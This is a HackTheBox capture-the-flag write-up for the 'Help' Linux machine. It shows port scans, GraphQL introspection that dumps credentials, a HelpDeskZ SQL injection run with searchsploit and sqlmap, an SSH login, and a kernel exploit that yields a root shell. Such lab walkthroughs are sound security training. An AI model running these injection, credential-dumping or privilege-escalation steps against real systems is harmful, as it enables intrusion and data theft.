Help

#Linux #SQLi #API

Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In the current post, my IP is 10.10.14.23, and the target’s IP is 10.129.227.176

I assume that the machine is pretty random, with the version obtainable only by a "readme", that you know about it existence from git... the url vulnerable to sqli is really hidden, I didn't like this maachine at all.

Recon

Local Terminal
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n

Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 128
80/tcp open  http    syn-ack ttl 128
3000/tcp open  ppp    syn-ack ttl 128

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
           Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)
Local Terminal
nmap -sCV -p 22,80 10.129.227.176 -oN Target

Nmap scan report for 10.129.227.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Local Terminal
whatweb help.htb

http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176], 
Title[Apache2 Ubuntu Default Page: It works]

  • Browser: http://help.htb

At this point we have nothing, it just a web site with the default index, from this point the best option is to FUZZ the target.

Local Terminal
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000041:   301        9 L      28 W       306 Ch      "support"
000001059:   301        9 L      28 W       309 Ch      "javascript"

"Support" and "JavaScript", virtually there is nothing, let's explore another port

http://help.htb/support/

We don't have any credentials or tools to use here...

Port 3000

http://help.htb:3000/

All right, this looks like a taunt, let's extract more information

Local Terminal
$ curl -v http://help.htb:3000/

*   Trying 10.129.227.176:3000...
* Connected to help.htb (10.129.227.176) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: Express 
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Sun, 09 Jul 2023 15:23:28 GMT
< Connection: keep-alive
<
* Connection #0 to host help.htb left intact
{"message":"Hi Shiv, To get access please find the credentials with given query"}

Nothing from curl, maybe we should fuzz it with a wordlist specific for API.

Local Terminal
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb:3000FUZZ/
Total requests: 584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000215:   400        0 L      3 W        18 Ch       "/graphql"
000000216:   400        0 L      3 W        18 Ch       "/graphql/console"

Total time: 0
Processed Requests: 562
Filtered Requests: 560
Requests/sec.: 0

So, there is a GraphQL running at the API, now we have to work with specific exploits.

Local Terminal
└─# curl -s http://help.htb:3000/graphql
GET query missing.

Usually Graphql is exploitable with POST, so intercept with Burpsuite, change the request method, add the line "Content-Type: application/json" and apply the first suggested payload

It works, and you can do the same with Curl

Local Terminal
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

We know that there is a "User" around, so we want now to dump it.

Local Terminal
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}
Local Terminal
curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .
{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}

And we found an email and a password, this should work for at other website, but first we need to thecrypt the password.

Exploitation

Reverse Shell (Help)

After exploring the website and testing the ticket system, I found nothing... let's just search about "HelpDeskZ Github"

http://help.htb/support/readme.html

Local Terminal
searchsploit HelpDeskZ

-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                             | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                      | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Local Terminal
searchsploit -m 41200.py

Edit the python script and add at the first line: #-- coding: utf-8 --

And at line 94, change to session = requests.session()

Local Terminal
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz

------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment

Ok, we need to submit another ticket with a file, and then execute the exploit again and wait.

At the end, it does not work, but at least now we know the URL where the injection happens.

http://help.htb/support/?v=view_tickets&action=ticket&param[]=5&param[]=attachment&param[]=1&param[]=7

Intercept the downloading process of a file, and save the request (saved as request).

Now execute sqlmap to extract the password.

Local Terminal
sqlmap -r request --level 5 --risk 3 -p param[]

We have the hash, slq1, after decrypt the password is { Welcome1 }, login through ssh to the machine.

Local Terminal
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz

------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment

Local Terminal
$ ssh -l help 10.129.227.176  # Password: Welcome1

$ cat user.txt
4dbb347ce71e1f06251894265c3bdb90

Privileges Escalation

We have the first flag, now we do some basic test for escalation

Target Terminal [help]
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

help@help:~$ sudo -l
[sudo] password for help:
Sorry, user help may not run sudo on help.

help@help:~$ cd /
help@help:/$ find / -perm -4000 2>/dev/null
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
<...>

help@help:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.5 LTS
Release:        16.04
Codename:       xenial

help@help:/$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

We found an unusually old version at "uname -a", after searching for "Linux Kernel 4.4.0-116" at exploitDB we found something.

Copy the script as "exploit.c" at tmp (paste using nano), and then compile with the command gcc -o attack exploit.c

Target Terminal [root]
help@help:/tmp$ ./attack
task_struct = ffff88003ba2aa80
uidptr = ffff88003ab0e184
spawning root shell

root@help:/tmp# cat /root/root.txt
62106a044573c82858c99023794af117
PreviousHaystackNextIrked

Last updated